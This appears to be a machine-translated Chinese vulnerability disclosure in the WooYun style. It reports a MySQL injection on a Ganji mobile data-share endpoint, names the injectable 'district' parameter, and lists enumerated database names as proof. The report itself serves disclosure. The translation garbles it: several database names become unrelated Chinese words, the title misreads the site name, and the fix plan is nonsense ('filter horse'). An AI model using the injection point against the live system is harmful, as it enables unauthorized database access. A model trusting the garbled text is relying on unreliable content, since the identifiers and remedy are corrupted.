漏洞标题 在市场上有一个MySQL注入。 相关制造商 赶集网 漏洞作者 Aasron 提交时间 2016-05-03 18: 42 公共时间 2016-06-20 10: 00 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 Php +字符型注入，注入技术，Mysql 漏洞详细信息 Mobds.ganji.cn/datashare/ 岗位 Action=1＆amp; filters={'major':'9'，'tag':'0'，'city':'0'，'district':'-1'，'price':'4'，'degree ':'0'，'work_years':'0'，'company_scale':'0'} 注入参数#district 共有17个数据库 漏洞证明： [*]`58monitor` [*] 安慰 [*]信用 [*] information_schema [*]管理 [*] mob_packget [*] mob_publish [*] mob_push [*] mobile_ad [*] mobile_app_config [*] mobile_job [*] mobqe [*] mysql [*] percona [*] performance_schema [*]测试 [*]插件 修理计划： 过滤马 版权声明：请注明出处Aasron @乌云